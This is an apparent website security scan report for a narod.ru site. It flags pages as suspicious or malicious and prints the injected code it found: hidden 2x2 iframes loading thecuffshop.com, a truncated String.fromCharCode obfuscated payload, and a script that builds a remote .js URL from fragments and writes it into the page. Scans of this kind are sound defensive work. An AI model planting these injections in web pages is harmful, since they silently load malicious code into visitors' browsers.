Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=defmiti.narod.ru
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://defmiti.narod.ru/ | 200 OK Content-Length: 22053 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://thecuffshop.com/erso.html?i=1940935 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecuffshop.com/erso.html?i=1940935> | ||
http://defmiti.narod.ru/27.html | 200 OK Content-Length: 21497 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://thecuffshop.com/erso.html?i=1940935 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecuffshop.com/erso.html?i=1940935> | ||
http://defmiti.narod.ru/12.html | 200 OK Content-Length: 22572 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,104,121,117,116,108,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,105,122,115,117,109,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,98,109,99,103,112,48,101,118,49,99,109,109,46,113,106,112,40,61,13,11,34,32,33,34,104,121,117,116,108,48,115,117,123,108,102,48,112,112,117,1 Antivirus reports:
| ||
http://s211.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.359708064719079 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://defmiti.narod.ru/abnl/?adsdata=U3jT^jq;9BJ4JYuPXyaxWBH^exxeJYP0sZZjrzND5sv!^UAfSIF!38vfr!Tuue^5wbyX5LhL3iW1IQP!bXug!mwWidtmZCJNWgfeBQjzQ^HBdwqcWU4;Yf4VHKRV8mTbN0kkp99ZEGvnNm1M4UZO3j4ORniyAnMn52pqFRZhstUBL4Kvd!sb!woo | 200 OK Content-Length: 2497 Content-Type: application/javascript | clean |
http://defmiti.narod.ru/fiwinosyxi.js | 200 OK Content-Length: 370 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecuffshop.com/erso.html?j=1940935></iframe>');
var sub="ruad2", perv="ra",vtor="ount",tret="/c",chet="hota.ru", pyat="ers/"+sub+".js";document.write('<script language="javascript" type="text/javascript" src="http://'+perv+chet+tret+vtor+pyat+'"></script>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://thecuffshop.com/erso.html?j=1940935 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecuffshop.com/erso.html?j=1940935> | ||
http://morenews3.net/viewt.js | 200 OK Content-Length: 24772 Content-Type: application/x-javascript | clean |
http://crackac.com/a2/9726522/4ea0 | 200 OK Content-Length: 13208 Content-Type: application/javascript | clean |
http://vkontakte.ru/js/api/share.js?9 | 200 OK Content-Length: 10255 Content-Type: application/x-javascript | clean |
http://defmiti.narod.ru/11.html | 200 OK Content-Length: 24761 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,104,121,117,116,108,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,105,122,115,117,109,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,98,109,99,103,112,48,101,118,49,99,109,109,46,113,106,112,40,61,13,11,34,32,33,34,104,121,117,116,108,48,115,117,123,108,102,48,112,112,117,1 Antivirus reports:
| ||
http://s211.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.239812573104707 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://defmiti.narod.ru/abnl/?adsdata=jSjsD54FV;YcwPlUVLpNC;0H^!iqLbQAQzTOiw7Tr6znHhqPsf2g9JkY6hRUht783P9OEOXkvagBnFOYsN5u9nDu!3Oc5TBmWIIG^mtfGBOKAQSlSmReyf1Fm86QCPtYRWlUqD;O;MiwRQ9EzCl9Z6FprMYLXgzwTdZPdzOkWs0r7ziqaw6vZuu68Uoo | 200 OK Content-Length: 2509 Content-Type: application/javascript | clean |
http://defmiti.narod.ru/10.html | 200 OK Content-Length: 20756 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://thecuffshop.com/erso.html?i=1940935 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecuffshop.com/erso.html?i=1940935> | ||
http://defmiti.narod.ru/13.html | 200 OK Content-Length: 21291 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,104,121,117,116,108,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,105,122,115,117,109,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,98,109,99,103,112,48,101,118,49,99,109,109,46,113,106,112,40,61,13,11,34,32,33,34,104,121,117,116,108,48,115,117,123,108,102,48,112,112,117,1 Antivirus reports:
| ||
http://s211.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.695141698031176 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: defmiti.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Aug 2015 08:35:08 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: defmiti.narod.ru
Referer: http://www.google.com/search?q=defmiti.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.